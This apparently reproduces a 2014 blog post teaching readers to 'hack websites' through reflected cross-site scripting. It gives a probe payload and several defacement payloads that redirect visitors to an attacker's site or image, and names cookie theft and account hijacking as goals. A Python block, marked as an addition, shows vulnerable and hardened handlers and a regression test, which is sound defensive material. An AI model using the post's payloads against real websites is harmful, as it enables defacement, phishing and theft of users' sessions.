Saturday, 8 February 2014

Hack websites using Cross-Site Scripting (XSS)



Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy.


Types of XSS vulnerabilities:

1. Persistent
2. Non-persistent


In this post I am going to explain the non-persistent vulnerability.


The non-persistent XSS vulnerability is the most common type of XSS flaw. It is a server-side vulnerability: when a web server takes any input from a user and returns the same input back to the user without any validation, the result is a non-persistent XSS vulnerability.
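
The flaw described above and its fix, as an added example that is not part of the original post: two minimal WSGI handlers, one reflecting a `q` parameter verbatim and one HTML-encoding it and sending a Content-Security-Policy header. The handler names, the `q` parameter, the template and the header values are assumptions; the two probe strings are the ones this post uses.

```python
import html
from urllib.parse import parse_qs, quote_plus

# The two test strings from this post, reused as regression inputs.
PROBES = ['<script>alert("hackinginception");</script>',
          '"><script>location="www.website.com/yourdefacepic";</script>']

# Hypothetical page: the value lands in an attribute and in element text.
TEMPLATE = '<form><input name="q" value="{q}"></form><p>Results for: {q}</p>'

def _param(environ, name):
    return parse_qs(environ.get("QUERY_STRING", "")).get(name, [""])[0]

def vulnerable_app(environ, start_response):
    """Reflects q verbatim into the HTML: the flaw described above."""
    body = TEMPLATE.format(q=_param(environ, "q"))
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [body.encode("utf-8")]

def hardened_app(environ, start_response):
    """Same page with output encoding, plus a CSP as defence in depth."""
    q = html.escape(_param(environ, "q"), quote=True)  # & < > " ' -> entities
    body = TEMPLATE.format(q=q)
    start_response("200 OK", [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Security-Policy", "default-src 'self'; script-src 'self'"),
        ("X-Content-Type-Options", "nosniff"),
    ])
    return [body.encode("utf-8")]

def fetch(app, value):
    """Call a WSGI app in-process with ?q=<value>; return (headers, body)."""
    captured = {}
    def start_response(status, headers):
        captured["headers"] = dict(headers)
    environ = {"REQUEST_METHOD": "GET", "QUERY_STRING": "q=" + quote_plus(value)}
    body = b"".join(app(environ, start_response)).decode("utf-8")
    return captured["headers"], body

def reflected_raw(app, value):
    """True if the response echoes the value unencoded (regression check)."""
    return value in fetch(app, value)[1]

if __name__ == "__main__":
    for probe in PROBES:
        print("vulnerable:", reflected_raw(vulnerable_app, probe),
              "hardened:", reflected_raw(hardened_app, probe))
```

`reflected_raw` can run in a test suite against every handler that echoes request data, so a template that drops the encoding step fails the build.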


What can a hacker do with this?


XSS attacks can be used for the following:

• Compromising and hijacking accounts
• Stealing user cookies
• Defacing websites
• Phishing attacks
• Posting false or hostile content


Steps to hack:


Step 1: Find vulnerability.


Step 2: Deface.


Finding out the vulnerability:


1) Find a text box in the site, or anything else where you can submit text.






2) Type in the following:

<script>alert("hackinginception");</script>


3) If it is vulnerable, it should look like this:






Defacing:

There are several ways to deface a site once you find an XSS vulnerability.


1) Make a picture pop up:

"><script>location="www.website.com/yourdefacepic";</script>


2) Replace the content of the page with an image:

<img src="yoursite.com/yourdefacepic">


3) Redirect to a website:

<script>window.location="http://www.yoursite.com"</script>
